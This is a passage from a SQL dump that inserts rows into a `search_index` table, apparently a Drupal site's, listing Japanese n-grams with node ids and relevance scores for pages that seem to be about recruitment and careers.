('をスタ', 164, 'ja', 'node_search', 1),
('をスタ', 167, 'ja', 'node_search', 1),
('をスタ', 169, 'ja', 'node_search', 1),
('をスタ', 171, 'ja', 'node_search', 1),
('をスタ', 173, 'ja', 'node_search', 0.968904),
('をスタ', 174, 'ja', 'node_search', 1),
('をスタ', 176, 'ja', 'node_search', 1),
('をスタ', 177, 'ja', 'node_search', 1),
('をマス', 24, 'ja', 'node_search', 0.398673),
('をマス', 62, 'ja', 'node_search', 0.851346),
('を丁寧', 133, 'ja', 'node_search', 1),
('を上手', 18, 'ja', 'node_search', 0.942091),
('を今後', 80, 'ja', 'node_search', 1),
('を付け', 77, 'ja', 'node_search', 4),
('を代表', 133, 'ja', 'node_search', 0.822065),
('を使っ', 30, 'ja', 'node_search', 1.84234),
('を促進', 27, 'ja', 'node_search', 0.31448),
('を促進', 135, 'ja', 'node_search', 0.906287),
('を促進', 136, 'ja', 'node_search', 0.661163),
('を保ち', 23, 'ja', 'node_search', 0.500884),
('を保証', 136, 'ja', 'node_search', 0.827757),
('を信じ', 69, 'ja', 'node_search', 0.920273),
('を信じ', 120, 'ja', 'node_search', 1),
('を信頼', 69, 'ja', 'node_search', 1),
('を信頼', 135, 'ja', 'node_search', 0.677939),
('を修了', 142, 'ja', 'node_search', 0.851346),
('を修了', 181, 'ja', 'node_search', 1),
('を修了', 183, 'ja', 'node_search', 1),
('を克服', 62, 'ja', 'node_search', 0.802752),
('を出発', 126, 'ja', 'node_search', 1),
('を募集', 5, 'ja', 'node_search', 0.78951),
('を募集', 8, 'ja', 'node_search', 2),
('を募集', 135, 'ja', 'node_search', 0.736141),
('を募集', 163, 'ja', 'node_search', 1),
('を十分', 189, 'ja', 'node_search', 0.923838),
('を卒業', 18, 'ja', 'node_search', 0.972861),
('を卒業', 62, 'ja', 'node_search', 1),
('を厳守', 77, 'ja', 'node_search', 4),
('を厳守', 87, 'ja', 'node_search', 1),
('を取り', 62, 'ja', 'node_search', 1),
('を取り', 122, 'ja', 'node_search', 1),
('を取得', 23, 'ja', 'node_search', 1.44424),
('を取得', 111, 'ja', 'node_search', 1),
('を取得', 147, 'ja', 'node_search', 7),
('を受け', 3, 'ja', 'node_search', 1.82421),
('を受け', 6, 'ja', 'node_search', 3),
('を受け', 23, 'ja', 'node_search', 0.557303),
('を受け', 24, 'ja', 'node_search', 0.354998),
('を受け', 27, 'ja', 'node_search', 0.411376),
('を受け', 136, 'ja', 'node_search', 0.771698),
('を受け', 138, 'ja', 'node_search', 1),
('を受け', 142, 'ja', 'node_search', 0.816452),
('を可能', 27, 'ja', 'node_search', 0.523573),
('を向上', 87, 'ja', 'node_search', 0.827757),
('を含め', 163, 'ja', 'node_search', 0.839384),
('を問わ', 23, 'ja', 'node_search', 0.620288),
('を営ん', 27, 'ja', 'node_search', 0.869951),
('を基本', 25, 'ja', 'node_search', 1),
('を変え', 3, 'ja', 'node_search', 0.677939),
('を多く', 23, 'ja', 'node_search', 0.687638),
('を大い', 188, 'ja', 'node_search', 0.873132),
('を大切', 69, 'ja', 'node_search', 1),
('を奨励', 133, 'ja', 'node_search', 0.705825),
('を学び', 3, 'ja', 'node_search', 0.916736),
('を学び', 87, 'ja', 'node_search', 1.45004),
('を学ぶ', 23, 'ja', 'node_search', 0.482016),
('を学生', 133, 'ja', 'node_search', 0.892724),
('を守る', 142, 'ja', 'node_search', 0.676032),
('を完全', 87, 'ja', 'node_search', 0.752312),
('を実施', 142, 'ja', 'node_search', 1),
('を対象', 140, 'ja', 'node_search', 20),
('を対象', 155, 'ja', 'node_search', 1),
('を対象', 162, 'ja', 'node_search', 1),
('を対象', 163, 'ja', 'node_search', 2),
('を尊敬', 87, 'ja', 'node_search', 1),
('を少し', 5, 'ja', 'node_search', 0.76431),
('を少な', 3, 'ja', 'node_search', 1),
('を尽く', 87, 'ja', 'node_search', 0.699655),
('を差し', 8, 'ja', 'node_search', 2),
('を希望', 162, 'ja', 'node_search', 0.687638),
('を常に', 80, 'ja', 'node_search', 1),
('を広げ', 183, 'ja', 'node_search', 0.920273),
('を広げ', 196, 'ja', 'node_search', 0.980874),
('を建設', 27, 'ja', 'node_search', 1.03296),
('を強化', 142, 'ja', 'node_search', 0.931053),
('を待つ', 62, 'ja', 'node_search', 0.906287),
('を得て', 23, 'ja', 'node_search', 0.961087),
('を得ら', 194, 'ja', 'node_search', 0.819249),
('を心よ', 154, 'ja', 'node_search', 1),
('を心よ', 160, 'ja', 'node_search', 0.938382),
('を心よ', 165, 'ja', 'node_search', 0.909743),
('を心よ', 166, 'ja', 'node_search', 0.980874),
('を心よ', 167, 'ja', 'node_search', 0.913226),
('を心よ', 169, 'ja', 'node_search', 0.886095),
('を心よ', 171, 'ja', 'node_search', 0.863659),
('を心よ', 173, 'ja', 'node_search', 0.851346),
('を心よ', 174, 'ja', 'node_search', 0.794753),
('を心よ', 175, 'ja', 'node_search', 0.857458),
('を心よ', 176, 'ja', 'node_search', 0.909743),
('を心よ', 177, 'ja', 'node_search', 0.786915),
('を心よ', 178, 'ja', 'node_search', 0.860547),
('を心よ', 182, 'ja', 'node_search', 0.863659),
('を心よ', 183, 'ja', 'node_search', 0.792123),
('を心よ', 184, 'ja', 'node_search', 0.784336),
('を心よ', 187, 'ja', 'node_search', 0.786915),
('を心よ', 190, 'ja', 'node_search', 0.822065),
('を心よ', 194, 'ja', 'node_search', 0.802752),
('を心よ', 195, 'ja', 'node_search', 0.906287),
('を心よ', 197, 'ja', 'node_search', 0.824901),
('を心よ', 198, 'ja', 'node_search', 0.863659),
('を心配', 98, 'ja', 'node_search', 1),
('を感じ', 120, 'ja', 'node_search', 0.945829),
('を手に', 3, 'ja', 'node_search', 1),
('を手に', 194, 'ja', 'node_search', 1),
('を扱っ', 133, 'ja', 'node_search', 0.989021),
('を抱き', 62, 'ja', 'node_search', 0.532778),
('を拠点', 27, 'ja', 'node_search', 0.931053),
('を拡張', 62, 'ja', 'node_search', 0.824901),
('を持た', 24, 'ja', 'node_search', 0.640063),
('を持ち', 87, 'ja', 'node_search', 1),
('を持ち', 136, 'ja', 'node_search', 0.712106),
('を持っ', 3, 'ja', 'node_search', 1),
('を持っ', 5, 'ja', 'node_search', 28),
('を持っ', 6, 'ja', 'node_search', 28),
('を持っ', 24, 'ja', 'node_search', 0.421281),
('を持っ', 162, 'ja', 'node_search', 0.664818),
('を持つ', 7, 'ja', 'node_search', 5.68893),
('を持つ', 133, 'ja', 'node_search', 1),
('を捨て', 87, 'ja', 'node_search', 0.72066),
('を排除', 136, 'ja', 'node_search', 0.697623),
('を掴む', 24, 'ja', 'node_search', 0.496787),
('を掴ん', 62, 'ja', 'node_search', 4),
('を提供', 23, 'ja', 'node_search', 1.40742),
('を提供', 24, 'ja', 'node_search', 0.820189),
('を提供', 27, 'ja', 'node_search', 1.29863),
('を提供', 62, 'ja', 'node_search', 1.68474),
('を提供', 135, 'ja', 'node_search', 1.6916),
('を提供', 136, 'ja', 'node_search', 1),
('を提供', 138, 'ja', 'node_search', 0.745294),
('を提供', 185, 'ja', 'node_search', 0.916736),
('を支え', 188, 'ja', 'node_search', 0.98493),
('を支え', 189, 'ja', 'node_search', 1),
('を支援', 142, 'ja', 'node_search', 0.635),
('を支援', 154, 'ja', 'node_search', 0.805455),
('を支援', 164, 'ja', 'node_search', 0.769219),
('を支援', 165, 'ja', 'node_search', 0.766757),
('を支援', 167, 'ja', 'node_search', 0.836446),
('を支援', 173, 'ja', 'node_search', 0.779231),
('を支援', 174, 'ja', 'node_search', 0.738408),
('を支援', 175, 'ja', 'node_search', 0.786915),
('を支援', 176, 'ja', 'node_search', 0.757065),
('を支給', 18, 'ja', 'node_search', 1),
('を教え', 24, 'ja', 'node_search', 0.430168),
('を教え', 28, 'ja', 'node_search', 1),
('を日本', 23, 'ja', 'node_search', 0.869951),
('を日本', 27, 'ja', 'node_search', 0.625231),
('を日本', 69, 'ja', 'node_search', 0.953396),
('を最大', 116, 'ja', 'node_search', 1),
('を望ん', 150, 'ja', 'node_search', 1),
('を期待', 140, 'ja', 'node_search', 0.786915),
('を活か', 163, 'ja', 'node_search', 1),
('を活か', 176, 'ja', 'node_search', 0.993146),
('を活か', 195, 'ja', 'node_search', 1),
('を流暢', 30, 'ja', 'node_search', 1.84234),
('を深め', 122, 'ja', 'node_search', 0.906287),
('を理解', 3, 'ja', 'node_search', 0.535131),
('を理解', 77, 'ja', 'node_search', 4),
('を理解', 87, 'ja', 'node_search', 1),
('を理解', 122, 'ja', 'node_search', 2),
('を生み', 25, 'ja', 'node_search', 1),
('を生み', 26, 'ja', 'node_search', 1),
('を監督', 142, 'ja', 'node_search', 0.648686),
('を目の', 135, 'ja', 'node_search', 0.824901),
('を目指', 135, 'ja', 'node_search', 0.687638),
('を目指', 155, 'ja', 'node_search', 1.74529),
('を目指', 162, 'ja', 'node_search', 1),
('を目指', 165, 'ja', 'node_search', 1),
('を目標', 155, 'ja', 'node_search', 0.699655),
('を知っ', 3, 'ja', 'node_search', 0.794753),
('を確信', 116, 'ja', 'node_search', 1),
('を確認', 62, 'ja', 'node_search', 2.56025),
('を磨く', 62, 'ja', 'node_search', 1.69118),
('を磨く', 116, 'ja', 'node_search', 1),
('を示し', 87, 'ja', 'node_search', 0.575885),
('を祈っ', 111, 'ja', 'node_search', 1),
('を祈り', 73, 'ja', 'node_search', 1),
('を祝う', 120, 'ja', 'node_search', 19),
('を称賛', 140, 'ja', 'node_search', 1),
('を積み', 116, 'ja', 'node_search', 1),
('を積み', 167, 'ja', 'node_search', 0.98493),
('を積み', 169, 'ja', 'node_search', 0.931053),
('を積み', 173, 'ja', 'node_search', 0.913226),
('を積み', 175, 'ja', 'node_search', 0.923838),
('を積み', 176, 'ja', 'node_search', 0.953396),
('を積み', 177, 'ja', 'node_search', 0.836446),
('を積み', 182, 'ja', 'node_search', 1),
('を積み', 184, 'ja', 'node_search', 0.848323),
('を積み', 190, 'ja', 'node_search', 0.857458),
('を積み', 197, 'ja', 'node_search', 0.860547),
('を積む', 95, 'ja', 'node_search', 19),
('を積む', 136, 'ja', 'node_search', 1.59941),
('を積む', 194, 'ja', 'node_search', 1),
('を積め', 98, 'ja', 'node_search', 1),
('を築か', 156, 'ja', 'node_search', 1),
('を築か', 157, 'ja', 'node_search', 0.913226),
('を築か', 167, 'ja', 'node_search', 0.934703),
('を築く', 25, 'ja', 'node_search', 1),
('を築く', 163, 'ja', 'node_search', 1),
('を築く', 175, 'ja', 'node_search', 1),
('を築く', 178, 'ja', 'node_search', 1),
('を築く', 187, 'ja', 'node_search', 1),
('を終え', 169, 'ja', 'node_search', 1),
('を経て', 173, 'ja', 'node_search', 1),
('を経て', 174, 'ja', 'node_search', 1),
('を経て', 184, 'ja', 'node_search', 1),
('を結び', 171, 'ja', 'node_search', 0.938382),
('を結び', 175, 'ja', 'node_search', 0.997306),
('を結び', 177, 'ja', 'node_search', 0.923838),
('を結び', 178, 'ja', 'node_search', 1),
('を結び', 179, 'ja', 'node_search', 0.906287),
('を結び', 184, 'ja', 'node_search', 0.934703),
('を結び', 185, 'ja', 'node_search', 1),
('を結び', 187, 'ja', 'node_search', 1),
('を結ん', 191, 'ja', 'node_search', 1),
('を継続', 24, 'ja', 'node_search', 0.367143),
('を続け', 23, 'ja', 'node_search', 0.469016),
('を続け', 140, 'ja', 'node_search', 0.957226),
('を続け', 160, 'ja', 'node_search', 0.76431),
('を続け', 183, 'ja', 'node_search', 0.827757),
('を維持', 142, 'ja', 'node_search', 1),
('を緊急', 10, 'ja', 'node_search', 3),
('を緊急', 18, 'ja', 'node_search', 3),
('を練習', 138, 'ja', 'node_search', 0.779231),
('を育て', 87, 'ja', 'node_search', 0.582831),
('を育み', 135, 'ja', 'node_search', 0.860547),
('を育ん', 120, 'ja', 'node_search', 0.896076),
('を育成', 23, 'ja', 'node_search', 0.42791),
('を自分', 77, 'ja', 'node_search', 4),
('を行い', 9, 'ja', 'node_search', 3),
('を行い', 17, 'ja', 'node_search', 4),
('を行う', 27, 'ja', 'node_search', 0.339877),
('を行う', 162, 'ja', 'node_search', 0.906287),
('を行っ', 23, 'ja', 'node_search', 1.54111),
('を行っ', 24, 'ja', 'node_search', 0.620288),
('を行っ', 27, 'ja', 'node_search', 0.550958),
('を行っ', 179, 'ja', 'node_search', 0.822065),
('を見せ', 80, 'ja', 'node_search', 1),
('を見つ', 3, 'ja', 'node_search', 1.18025),
('を見つ', 23, 'ja', 'node_search', 0.488796),
('を見抜', 26, 'ja', 'node_search', 1),
('を視察', 9, 'ja', 'node_search', 3),
('を視察', 17, 'ja', 'node_search', 4),
('を訪問', 162, 'ja', 'node_search', 0.945829),
('を設立', 23, 'ja', 'node_search', 1),
('を証明', 62, 'ja', 'node_search', 0.670377),
('を証明', 181, 'ja', 'node_search', 1),
('を証明', 182, 'ja', 'node_search', 1),
('を証明', 183, 'ja', 'node_search', 1),
('を誇り', 69, 'ja', 'node_search', 1),
('を誇り', 87, 'ja', 'node_search', 0.600219),
('を踏み', 175, 'ja', 'node_search', 1),
('を踏み', 177, 'ja', 'node_search', 0.873132),
('を踏み', 184, 'ja', 'node_search', 0.889397),
('を踏み', 190, 'ja', 'node_search', 0.942091),
('を身に', 140, 'ja', 'node_search', 0.899454),
('を身に', 142, 'ja', 'node_search', 0.707906),
('を身に', 193, 'ja', 'node_search', 0.953396),
('を軽減', 138, 'ja', 'node_search', 1.51837),
('を辞め', 3, 'ja', 'node_search', 0.620288),
('を迎え', 120, 'ja', 'node_search', 1),
('を迎え', 184, 'ja', 'node_search', 1),
('を送ら', 175, 'ja', 'node_search', 0.876337),
('を送ら', 177, 'ja', 'node_search', 0.797402),
('を送ら', 184, 'ja', 'node_search', 0.800068),
('を通し', 120, 'ja', 'node_search', 1),
('を通し', 135, 'ja', 'node_search', 0.927431),
('を通じ', 27, 'ja', 'node_search', 0.45586),
('を通じ', 138, 'ja', 'node_search', 1),
('を通じ', 142, 'ja', 'node_search', 1.67623),
('を通じ', 156, 'ja', 'node_search', 1.94583),
('を通じ', 157, 'ja', 'node_search', 1.83645),
('を通じ', 181, 'ja', 'node_search', 1),
('を通じ', 189, 'ja', 'node_search', 0.957226),
('を通じ', 193, 'ja', 'node_search', 0.993146),
('を進め', 142, 'ja', 'node_search', 1),
('を運営', 25, 'ja', 'node_search', 1),
('を達成', 181, 'ja', 'node_search', 1),
('を達成', 182, 'ja', 'node_search', 1),
('を達成', 183, 'ja', 'node_search', 1),
('を選ぶ', 87, 'ja', 'node_search', 1),
('を避け', 142, 'ja', 'node_search', 1),
('を重ね', 24, 'ja', 'node_search', 1),
('を重ね', 165, 'ja', 'node_search', 0.980874),
('を重ね', 169, 'ja', 'node_search', 0.909743),
('を重ね', 183, 'ja', 'node_search', 1),
('を開い', 62, 'ja', 'node_search', 0.495774),
('を開け', 62, 'ja', 'node_search', 0.478227),
('を開始', 23, 'ja', 'node_search', 1),
('を開始', 27, 'ja', 'node_search', 1.31729),
('を開始', 28, 'ja', 'node_search', 3),
('を開設', 24, 'ja', 'node_search', 0.45164),
('を開講', 155, 'ja', 'node_search', 1),
('を除く', 62, 'ja', 'node_search', 1.16591),
('を雇用', 23, 'ja', 'node_search', 0.781775),
('を願っ', 154, 'ja', 'node_search', 0.866793),
('を願っ', 161, 'ja', 'node_search', 0.76188),
('を願っ', 164, 'ja', 'node_search', 0.830633),
('を願っ', 165, 'ja', 'node_search', 0.819249),
('を願っ', 166, 'ja', 'node_search', 0.808176),
('を願っ', 168, 'ja', 'node_search', 0.794753),
('を願っ', 170, 'ja', 'node_search', 0.779231),
('を願っ', 185, 'ja', 'node_search', 0.76431),
('を願っ', 189, 'ja', 'node_search', 0.76431),
('を願っ', 199, 'ja', 'node_search', 0.769219),
('んがニ', 181, 'ja', 'node_search', 0.802752),
('んがニ', 182, 'ja', 'node_search', 3.2547),
('んがニ', 183, 'ja', 'node_search', 2.99983);
INSERT INTO `search_index` (`word`, `sid`, `langcode`, `type`, `score`) VALUES
('んが日', 121, 'ja', 'node_search', 1),
('んが日', 181, 'ja', 'node_search', 1),
('んが日', 182, 'ja', 'node_search', 1),
('んが日', 183, 'ja', 'node_search', 1),
('んが特', 156, 'ja', 'node_search', 0.945829),
('んが特', 160, 'ja', 'node_search', 3.99047),
('んが特', 161, 'ja', 'node_search', 1.74996),
('んが特', 166, 'ja', 'node_search', 4.08679),
('んが特', 168, 'ja', 'node_search', 1.75946),
('んが特', 170, 'ja', 'node_search', 3.98118),
('んが特', 171, 'ja', 'node_search', 1),
('んが特', 174, 'ja', 'node_search', 1),
('んが特', 175, 'ja', 'node_search', 1),
('んが特', 177, 'ja', 'node_search', 1),
('んが特', 178, 'ja', 'node_search', 1.78178),
('んが特', 179, 'ja', 'node_search', 0.736141),
('んが特', 180, 'ja', 'node_search', 1.80007),
('んが特', 184, 'ja', 'node_search', 1),
('んが特', 185, 'ja', 'node_search', 4.00925),
('んが特', 186, 'ja', 'node_search', 1.76922),
('んが特', 187, 'ja', 'node_search', 3.96276),
('んが特', 188, 'ja', 'node_search', 1.76188),
('んが特', 189, 'ja', 'node_search', 3.99983),
('んが特', 190, 'ja', 'node_search', 4.07688),
('んが特', 191, 'ja', 'node_search', 4.2327),
('んが特', 192, 'ja', 'node_search', 4.11692),
('んが特', 193, 'ja', 'node_search', 4.17901),
('んが特', 194, 'ja', 'node_search', 4.00925),
('んが特', 195, 'ja', 'node_search', 1.80545),
('んが特', 196, 'ja', 'node_search', 4.18961),
('んが特', 197, 'ja', 'node_search', 4.07688),
('んが特', 198, 'ja', 'node_search', 1.78178),
('んが特', 199, 'ja', 'node_search', 4.01872),
('んが秋', 141, 'ja', 'node_search', 1),
('んだ結', 191, 'ja', 'node_search', 1),
('んでい', 120, 'ja', 'node_search', 0.889397),
('んでい', 150, 'ja', 'node_search', 1),
('んでお', 24, 'ja', 'node_search', 0.736141),
('んでお', 27, 'ja', 'node_search', 0.863659),
('んでお', 150, 'ja', 'node_search', 1),
('んでく', 62, 'ja', 'node_search', 4),
('んでく', 77, 'ja', 'node_search', 1),
('んとし', 87, 'ja', 'node_search', 0.920273),
('んと行', 23, 'ja', 'node_search', 0.802752),
('んなの', 62, 'ja', 'node_search', 0.59873),
('んな仕', 87, 'ja', 'node_search', 1),
('んの努', 140, 'ja', 'node_search', 1),
('んの成', 140, 'ja', 'node_search', 1),
('んの継', 140, 'ja', 'node_search', 0.816452),
('ァイリ', 30, 'ja', 'node_search', 1.84234),
('ァミリ', 62, 'ja', 'node_search', 0.508221),
('アが充', 189, 'ja', 'node_search', 0.794753),
('アが実', 166, 'ja', 'node_search', 0.842342),
('アに関', 24, 'ja', 'node_search', 0.676032),
('アのス', 154, 'ja', 'node_search', 1),
('アのポ', 10, 'ja', 'node_search', 28),
('アの第', 168, 'ja', 'node_search', 0.819249),
('アの第', 170, 'ja', 'node_search', 0.802752),
('アへの', 160, 'ja', 'node_search', 4),
('アへの', 161, 'ja', 'node_search', 1),
('アへの', 173, 'ja', 'node_search', 27),
('アへの', 180, 'ja', 'node_search', 0.968904),
('アへの', 184, 'ja', 'node_search', 0.909743),
('アへの', 186, 'ja', 'node_search', 1),
('アへの', 196, 'ja', 'node_search', 0.923838),
('アをス', 164, 'ja', 'node_search', 1),
('アをス', 167, 'ja', 'node_search', 1),
('アをス', 169, 'ja', 'node_search', 1),
('アをス', 171, 'ja', 'node_search', 1),
('アをス', 173, 'ja', 'node_search', 0.972861),
('アをス', 174, 'ja', 'node_search', 1),
('アをス', 176, 'ja', 'node_search', 1),
('アをス', 177, 'ja', 'node_search', 1),
('アを目', 165, 'ja', 'node_search', 1),
('アを築', 156, 'ja', 'node_search', 1),
('アを築', 157, 'ja', 'node_search', 0.916736),
('アを築', 163, 'ja', 'node_search', 1),
('アを築', 175, 'ja', 'node_search', 1),
('アを築', 178, 'ja', 'node_search', 1),
('アを築', 187, 'ja', 'node_search', 1),
('アを緊', 10, 'ja', 'node_search', 3),
('アウン', 23, 'ja', 'node_search', 0.72066),
('アウン', 27, 'ja', 'node_search', 5.29478),
('アクセ', 138, 'ja', 'node_search', 0.792123),
('アクテ', 5, 'ja', 'node_search', 0.802752),
('アシス', 30, 'ja', 'node_search', 0.869951),
('アデザ', 27, 'ja', 'node_search', 0.379004),
('アドバ', 120, 'ja', 'node_search', 1),
('アドミ', 30, 'ja', 'node_search', 0.896076),
('アブダ', 18, 'ja', 'node_search', 28),
('アプロ', 136, 'ja', 'node_search', 1),
('アプロ', 138, 'ja', 'node_search', 1),
('アント', 25, 'ja', 'node_search', 2),
('アント', 27, 'ja', 'node_search', 0.417688),
('ア実現', 193, 'ja', 'node_search', 1),
('ア実現', 198, 'ja', 'node_search', 1),
('ア形成', 162, 'ja', 'node_search', 1.68961),
('ア形成', 185, 'ja', 'node_search', 1),
('ィカレ', 10, 'ja', 'node_search', 1),
('ィスの', 7, 'ja', 'node_search', 1.8861),
('ィッ建', 27, 'ja', 'node_search', 0.725015),
('ィネー', 30, 'ja', 'node_search', 1),
('ィブな', 5, 'ja', 'node_search', 0.794753),
('ィブス', 136, 'ja', 'node_search', 1.74529),
('ィブ講', 133, 'ja', 'node_search', 1),
('ィング', 11, 'ja', 'node_search', 19),
('ィング', 17, 'ja', 'node_search', 1),
('ィング', 19, 'ja', 'node_search', 1),
('ィング', 23, 'ja', 'node_search', 3.0823),
('ィング', 24, 'ja', 'node_search', 1.46543),
('ィング', 25, 'ja', 'node_search', 1),
('ィング', 27, 'ja', 'node_search', 1),
('ィング', 154, 'ja', 'node_search', 1.84832),
('ィング', 160, 'ja', 'node_search', 1.83938),
('ィング', 161, 'ja', 'node_search', 1.8861),
('ィング', 162, 'ja', 'node_search', 1.63167),
('ィング', 163, 'ja', 'node_search', 1),
('ィング', 164, 'ja', 'node_search', 1.81367),
('ィング', 165, 'ja', 'node_search', 1.80545),
('ィング', 166, 'ja', 'node_search', 1),
('ィング', 167, 'ja', 'node_search', 1.88282),
('ィング', 168, 'ja', 'node_search', 1),
('ィング', 169, 'ja', 'node_search', 1),
('ィング', 170, 'ja', 'node_search', 1),
('ィング', 171, 'ja', 'node_search', 1),
('ィング', 173, 'ja', 'node_search', 1.8249),
('ィング', 174, 'ja', 'node_search', 1.77419),
('ィング', 175, 'ja', 'node_search', 1.83353),
('ィング', 176, 'ja', 'node_search', 1.80007),
('ィング', 177, 'ja', 'node_search', 1),
('ィング', 178, 'ja', 'node_search', 1),
('ィング', 179, 'ja', 'node_search', 1.96109),
('ィング', 180, 'ja', 'node_search', 1),
('ィング', 184, 'ja', 'node_search', 1),
('ィング', 185, 'ja', 'node_search', 1),
('ィング', 186, 'ja', 'node_search', 1.92027),
('ィング', 187, 'ja', 'node_search', 1),
('ィング', 188, 'ja', 'node_search', 1),
('ィング', 189, 'ja', 'node_search', 1),
('ィング', 190, 'ja', 'node_search', 1),
('ィング', 191, 'ja', 'node_search', 1),
('ィング', 192, 'ja', 'node_search', 1),
('ィング', 193, 'ja', 'node_search', 1),
('ィング', 194, 'ja', 'node_search', 1),
('ィング', 195, 'ja', 'node_search', 1),
('ィング', 196, 'ja', 'node_search', 1),
('ィング', 197, 'ja', 'node_search', 1),
('ィング', 198, 'ja', 'node_search', 1),
('ィング', 199, 'ja', 'node_search', 1),
('ィン建', 23, 'ja', 'node_search', 0.707906),
('ィーコ', 27, 'ja', 'node_search', 6.55554),
('ィー建', 23, 'ja', 'node_search', 0.725015),
('ィ地域', 27, 'ja', 'node_search', 0.366597),
('ィ地方', 27, 'ja', 'node_search', 1.65755),
('ィ業界', 155, 'ja', 'node_search', 0.731649),
('イまた', 18, 'ja', 'node_search', 28),
('イアン', 25, 'ja', 'node_search', 2),
('イアン', 27, 'ja', 'node_search', 0.418401),
('イク造', 9, 'ja', 'node_search', 3),
('イク造', 17, 'ja', 'node_search', 4),
('イゴの', 126, 'ja', 'node_search', 1),
('イスを', 120, 'ja', 'node_search', 1),
('イズさ', 62, 'ja', 'node_search', 4),
('イティ', 133, 'ja', 'node_search', 1),
('イティ', 136, 'ja', 'node_search', 1.74529),
('イティ', 138, 'ja', 'node_search', 0.822065),
('イトと', 156, 'ja', 'node_search', 1),
('イトと', 157, 'ja', 'node_search', 1),
('イトを', 1, 'ja', 'node_search', 1),
('イビザ', 126, 'ja', 'node_search', 1),
('イメー', 116, 'ja', 'node_search', 1),
('イリン', 30, 'ja', 'node_search', 1.83965),
('イルは', 120, 'ja', 'node_search', 1),
('インと', 24, 'ja', 'node_search', 0.349971),
('インの', 27, 'ja', 'node_search', 0.378421),
('イング', 135, 'ja', 'node_search', 0.957226),
('インス', 135, 'ja', 'node_search', 1),
('インス', 136, 'ja', 'node_search', 1),
('インタ', 116, 'ja', 'node_search', 20),
('インタ', 122, 'ja', 'node_search', 20),
('インテ', 27, 'ja', 'node_search', 0.381353),
('インビ', 27, 'ja', 'node_search', 0.39674),
('イン地', 27, 'ja', 'node_search', 0.989021),
('イン大', 27, 'ja', 'node_search', 0.781775),
('イ湾岸', 23, 'ja', 'node_search', 0.582831),
('イ湾岸', 24, 'ja', 'node_search', 1),
('イ語学', 24, 'ja', 'node_search', 0.886095),
('ウィン', 23, 'ja', 'node_search', 0.71),
('ウェブ', 1, 'ja', 'node_search', 54),
('ウビン', 27, 'ja', 'node_search', 0.352466),
('ウンネ', 23, 'ja', 'node_search', 0.718502),
('ェクト', 27, 'ja', 'node_search', 3.50345),
('ェクト', 30, 'ja', 'node_search', 1),
('ェタゴ', 27, 'ja', 'node_search', 0.736141),
('ェッシ', 116, 'ja', 'node_search', 1),
('ェピー', 23, 'ja', 'node_search', 0.733888),
('ェブサ', 1, 'ja', 'node_search', 54),
('ェリー', 5, 'ja', 'node_search', 0.848323),
('ェンシ', 11, 'ja', 'node_search', 19),
('ェンシ', 17, 'ja', 'node_search', 1),
('ェンシ', 19, 'ja', 'node_search', 1),
('ェンシ', 23, 'ja', 'node_search', 2.0823),
('ェンシ', 24, 'ja', 'node_search', 1.46543),
('ェンシ', 27, 'ja', 'node_search', 1),
('ェンシ', 135, 'ja', 'node_search', 2.41121),
('ェンシ', 136, 'ja', 'node_search', 1.6916),
('ェンシ', 138, 'ja', 'node_search', 1),
('ェンシ', 154, 'ja', 'node_search', 1.84832),
('ェンシ', 160, 'ja', 'node_search', 1.83938),
('ェンシ', 161, 'ja', 'node_search', 1.8861),
('ェンシ', 162, 'ja', 'node_search', 1.63167),
('ェンシ', 163, 'ja', 'node_search', 1),
('ェンシ', 164, 'ja', 'node_search', 1.81367),
('ェンシ', 165, 'ja', 'node_search', 1.80545),
('ェンシ', 166, 'ja', 'node_search', 1),
('ェンシ', 167, 'ja', 'node_search', 1.88282),
('ェンシ', 168, 'ja', 'node_search', 1),
('ェンシ', 169, 'ja', 'node_search', 1),
('ェンシ', 170, 'ja', 'node_search', 1),
('ェンシ', 171, 'ja', 'node_search', 1),
('ェンシ', 173, 'ja', 'node_search', 1.8249),
('ェンシ', 174, 'ja', 'node_search', 1.77419),
('ェンシ', 175, 'ja', 'node_search', 1.83353),
('ェンシ', 176, 'ja', 'node_search', 1.80007),
('ェンシ', 177, 'ja', 'node_search', 1),
('ェンシ', 178, 'ja', 'node_search', 1),
('ェンシ', 179, 'ja', 'node_search', 1.96109),
('ェンシ', 180, 'ja', 'node_search', 1),
('ェンシ', 184, 'ja', 'node_search', 1),
('ェンシ', 185, 'ja', 'node_search', 1),
('ェンシ', 186, 'ja', 'node_search', 1.92027),
('ェンシ', 187, 'ja', 'node_search', 1),
('ェンシ', 188, 'ja', 'node_search', 1),
('ェンシ', 189, 'ja', 'node_search', 1),
('ェンシ', 190, 'ja', 'node_search', 1),
('ェンシ', 191, 'ja', 'node_search', 1),
('ェンシ', 192, 'ja', 'node_search', 1),
('ェンシ', 193, 'ja', 'node_search', 1),
('ェンシ', 194, 'ja', 'node_search', 1),
('ェンシ', 195, 'ja', 'node_search', 1),
('ェンシ', 196, 'ja', 'node_search', 1),
('ェンシ', 197, 'ja', 'node_search', 1),
('ェンシ', 198, 'ja', 'node_search', 1),
('ェンシ', 199, 'ja', 'node_search', 1),
('エチケ', 133, 'ja', 'node_search', 1),
('エリア', 162, 'ja', 'node_search', 0.800068),
('エンジ', 10, 'ja', 'node_search', 32),
('エンジ', 24, 'ja', 'node_search', 0.683725),
('エージ', 11, 'ja', 'node_search', 19),
('エージ', 17, 'ja', 'node_search', 1),
('エージ', 19, 'ja', 'node_search', 1),
('エージ', 23, 'ja', 'node_search', 2.0823),
('エージ', 24, 'ja', 'node_search', 1.46543),
('エージ', 27, 'ja', 'node_search', 1),
('エージ', 135, 'ja', 'node_search', 2.41121),
('エージ', 136, 'ja', 'node_search', 1.6916),
('エージ', 138, 'ja', 'node_search', 1),
('エージ', 154, 'ja', 'node_search', 1.84832),
('エージ', 160, 'ja', 'node_search', 1.83938),
('エージ', 161, 'ja', 'node_search', 1.8861),
('エージ', 162, 'ja', 'node_search', 1.63167),
('エージ', 163, 'ja', 'node_search', 1),
('エージ', 164, 'ja', 'node_search', 1.81367),
('エージ', 165, 'ja', 'node_search', 1.80545),
('エージ', 166, 'ja', 'node_search', 1),
('エージ', 167, 'ja', 'node_search', 1.88282),
('エージ', 168, 'ja', 'node_search', 1),
('エージ', 169, 'ja', 'node_search', 1),
('エージ', 170, 'ja', 'node_search', 1),
('エージ', 171, 'ja', 'node_search', 1),
('エージ', 173, 'ja', 'node_search', 1.8249),
('エージ', 174, 'ja', 'node_search', 1.77419),
('エージ', 175, 'ja', 'node_search', 1.83353),
('エージ', 176, 'ja', 'node_search', 1.80007),
('エージ', 177, 'ja', 'node_search', 1),
('エージ', 178, 'ja', 'node_search', 1),
('エージ', 179, 'ja', 'node_search', 1.96109),
